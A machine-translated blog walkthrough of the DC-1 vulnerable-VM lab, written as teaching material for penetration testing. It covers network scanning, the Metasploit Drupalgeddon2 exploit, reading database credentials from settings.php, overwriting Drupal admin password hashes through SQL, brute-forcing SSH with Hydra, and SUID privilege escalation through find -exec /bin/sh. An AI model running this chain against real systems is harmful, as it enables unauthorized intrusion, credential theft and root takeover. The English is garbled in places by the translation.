当前位置：网站首页>Detailed process of DC-1 range construction and penetration practice (DC range Series)

Prompt import failure , But it doesn't matter. Just try again , After import , open DC-1 Virtual machine and wait , Don't click into the virtual machine during the process

The appearance of this interface means that it is successfully opened （ After you get the password, you can log in ）, And then change kali The network connection mode of is bridge mode , Give Way DC Target heel kali In the same network segment , It works kali To sweep out DC The host , Of course, you can set it to net, But it has to be DC-1 The target is also set to net, If you don't understand the bridge mode, please refer to

“ The bridge ” and “NAT” The difference in the way - You know (zhihu.com)

Two . Infiltration process

This process requires kali, Open our penetrating weapon kali（root In mode ）

1. information gathering

① Target detection IP Address

There are many tools to detect the host , Common are arp-scan、nmap also netdiscover

arp-scan

arp-scan -l

This command is used to detect all of the current network segment ip Address

Then let's take a look at DC Target's Mac Address

To determine the DC The host IP The address is

192.168.120.128

nmap

Have a look first kali Of ip Address

ifconfig

Reuse nmap

nmap -sP 192.168.120.0/24

ip Change the back to 0/24, ad locum “192.168.120.0/24” It represents the of this network segment IP Address from 192.168.120.1 Start , To 192.168.120.254 end （192.168.120.0 and 192.168.120.255 It has special meaning and cannot be regarded as ip Address ）; The subnet mask is 255.255.255.0

Same sweep out ip

netdiscover

netdiscover

② Target detection IP Open ports

use nmap To detect

nmap -sV -p- 192.168.120.128

-sV Scan the software information running on the target host port
-p- Scan all ports 0-65535

20 and 80 Port is our breakthrough ,80 yes http agreement , Let's visit it with a browser

③ Web information collection

Use the tinder plug-in wappalyzer, View site information , You can also judge by yourself , Look at the webpage cms Namely drupal

You can also use it kali Built-in tools whatweb sweep

Hacking tools whatweb Detailed use of the tutorial - You know (zhihu.com)

whatweb -v 192.168.120.128

It can also sweep out CMS, And then use dirsearch Tools scan the catalog , command

dirsearch -u 192.168.120.128 -e *

I still swept out a lot of directories , But I can't use it for the time being , Put it first

Get the following information

CMS yes Drupal
Apache 2.2.22
PHP 5.4.45
jQuery 1.4.4

2. Vulnerability search and exploitation

know cms, We usually go from cms Start looking for loopholes , use Baidu Search drupal Loophole

Sure enough, there are framework vulnerabilities

① Vulnerability search

With tools Metasploit（ The world's leading penetration testing tool , It is also one of the largest open source projects in the field of information security and penetration testing ）, Look for loopholes , Open the tool first

msfconsole

Then type the command

search Drupal

You can see this cms There are still many loopholes in the framework , Here we take advantage of those with higher vulnerability levels , And the latest 18 The loophole in

② Exploit

utilize 18 The loophole in

use exploit/unix/webapp/drupal_drupalgeddon2

Then take a look at the vulnerability module parameters

show options

Current Setting Is the current setting
Required Indicates whether the content needs to be set ,yes Must be set ,no It can be set or not
As for the above RHOSTS need set, But there's no content

So let's set it up RHOSTS Content （ Is to attack the target IP Address , Range address ）

set RHOSTS 192.168.120.128

And then again show Here are the module parameters

After setting the parameters, start the attack

exploit

exploit and run It's the same , use run It's fine too

appear Meterpreter session 1 opened（kali And the target ip The connection of ） It means that the attack was successful , Next we can go directly shell

3. Getshell

① Get common shell

shell

Get some common shell

And then execute ls command

② Get interaction shell

It looks a little bit like that , But we can use it python Realize mutual communication shell, So it looks better , The premise of use is that the attack host must be equipped with python

python -c 'import pty; pty.spawn("/bin/bash")'

You can see this shell Permission of is just ordinary permission , Is not root, But I can also see the documents , First look at what you found flag1.txt file

tac flag1.txt

Check it out. flag1.txt file

Every good CMS All need a profile , the same to you ,emmm, Put this first , See if there's anything else flag file

find / -name flag*

ok , There is only one flag file , Take a look at the configuration file according to the previous prompts , Generally speaking, the configuration file contains some particularly important information , Maybe you can still raise your rights , Baidu Drupal The configuration file , The path is quite complicated, but I know the name is settings.php, We can use the command to search directly and open , Inline execution

cat `find / -name settings.php`

Here we have it flag2（ It seems unimportant ）, I also got a database by accident , Gave the account password , Let's have a look first

3. Database penetration

mysql -udbuser -pR0ck3t

Boarded in , In this way, we can modify the database at will , First, let's see what it is

show datebases;

Then use the database , And look at the table

use drupaldb;show tables;

be aware users This table , Let's see what , First change the font a little smaller , Otherwise, it may be crowded and unsightly

select * from users;

Get two users

| admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR |
| Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |

The password is so complicated , It should not be written , It's hard to get into the backstage , We can modify admin Password , Or add a new one admin

Reference resources ： Share ： forget Drupal The solution of administrator password | Drupal China

Law 1 ： modify admin password

We have to find the encrypted file first ,Drupal The encryption script of is in

/var/www/scripts/password-hash.sh

Under the table of contents , Let's quit first mysql

exit;

Open encryption script

cat /var/www/scripts/password-hash.sh

This script uses php Written , And it works php Run with parameters , Get the encrypted password directly , Here we set a password 123456

php /var/www/scripts/password-hash.sh 123456

Get the encrypted password , Then we log in mysql Revise it admin Follow Fred Password

mysql -udbuser -pR0ck3t

use drupaldb;update users set pass = "$S$D1UQvb3x7lKoCSX6S9K.r.wB202Lsa/r7fkOj7CelJsSEMFDJjGv" where name = 'admin' or name = 'Fred';

Password changed successfully

Law two ： add to admin Authorized users

drupal7 The version has a SQL Injected holes , You can add one admin Privileged user , Applicable version 7.31 following , We can do it in msf Look for this tool

searchsploit drupal

Then take a look at the script path

searchsploit 34992.py -p

Can pass URL Download the script to use , There's not much to show here , Then we login with the modified password

Go in and find flag3, It reminds us of some information passwd and shadow, Obviously linux The file of

/etc/passwd
This file stores the basic information of system users , All users can operate and read files
Linux /etc/passwd Content explanation （ Hyperdetail ）
/etc/shadow
This file stores the password and other information of the system user , Only root Only authorized users can read
Linux /etc/shadow（ Shadow file ） Content analysis （ Hyperdetail ）

Then let's check the user information

tac /etc/passwd

You can see that there is flag4 This user , We have two ways to get this user's password , One is blasting , The other is to raise the right to open shadow File view password

4. User password burst

Prior reference SSH

SSH Introduction and two methods of remote login _Jack LDZ The blog of -CSDN Blog _ssh

utilize an instrument Hydra Blast flag4 Password

（ summary ）Linux Violent password online cracking tool under Hydra Detailed explanation

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.120.128

Burst out the code orange, And then we use kali Connect

ssh [email protected]

@192.168.120.128
@ Destination host address

Input orange Log in

Open the flag4.txt,emmm In fact, it seems nothing

5. Linux Raise the right

Need to use SUID Raise the right , Reference resources

A brief talk on SUID Raise the right - FreeBuf Network security industry portal

utilize find command , Find out if you have SUID Executable binary of permissions

find / -perm -u=s -type f 2>/dev/null

find More commonly used , It can be executed root Command of permission to find files ,

find / -name index.php -exec "/bin/sh" \;

It doesn't matter what documents you look for （ But there are files ）, Only need the format pair , And then add
-exec "/bin/sh" \;
#!/bin/sh brief introduction - feng..liu - Blog Garden (cnblogs.com)

You can see that the right has been raised successfully , Next we just need to find the rest flag Even if the document passes the customs

cd /root

ls

cat *

Get the fifth flag La ！

3、 ... and . Harvest summary

1. Host scan

nmap

nmap -sP  Network segment

Nmap Detailed command

arp-scan

arp-scan -l

arp-scan Orders and ARP Explanation of meaning

netdiscover

netdiscover

Netdiscover Network scanning tool

2. Domain information collection

whatweb

whatweb -v  domain name

whatweb Detailed use of the tutorial

Tinder expansion wappalyzer
dirsearch

dirsearch -u  domain name

Directory scanning tool dirsearch Chinese Manual

3. CMS Find and exploit loopholes

Metasploit

To open the first MSF Console

msfconsole

Search for CMS Loophole

search cms name

Using modules

use  Vulnerability module name

Display module parameters （ Generally, you only need to set the attack target IP Address ）

show options

Set module parameters

set  Module parameter name   Parameter values

Start the attack

run( or exploit)

metasploit Introduction to penetration testing

4. Getshell

Use MSF The attack waits for the host to connect with the target

metasploit obtain shell Further use later

Usually, enter directly shell

shell

Get interaction shell（ The host of the other party should be equipped with python）

python -c 'import pty;pty.spawn("/bin/bash")'

5. Linux Features and related commands

View permissions （root Is the highest authority , Others are ordinary users ）

whoami

File properties passwd And shadow

/etc/passwd
The basic information of users is stored , Such as user name 、 user ID etc. , All users can access
Linux /etc/passwd Content explanation （ Hyperdetail ）
/etc/shadow
The user's password and other information are stored , need root Only users can access it
Linux /etc/shadow（ Shadow file ） Content analysis （ Hyperdetail ）

6. Password explosion and SSH

Blasting tools Hydra

Hacking tools hydra Detailed use of the tutorial

By blasting SSH For example

hydra -l  Specify user name  -p  Specified password  ssh:// The target host 
hydra -L  User dictionary  -P  Password dictionary  ssh:// The target host

We can use it after blasting kali Log in

ssh  user name @ Target attack host

SSH Introduction and two methods of remote login

7. Linux Systematic SUID Raise the right

A brief talk on SUID Raise the right

First find the one containing SUID Permission binary

find / -user root -perm -4000 -print 2>/dev/null

This command means to find SUID Permission binary , Filter the wrong spam
find / -perm -4000 2＞/dev/null Split and explain

Then select the relevant command to raise the right , With find For example （ Most used ）

First ls View the current catalog file , Suppose there are documents x.ab, Use common suid The powers of the find collocation exec Right to raise

find / -name x.ab -exec "/bin/sh" \;

原网站

版权声明
本文为[Golden silk]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/183/202207020433561714.html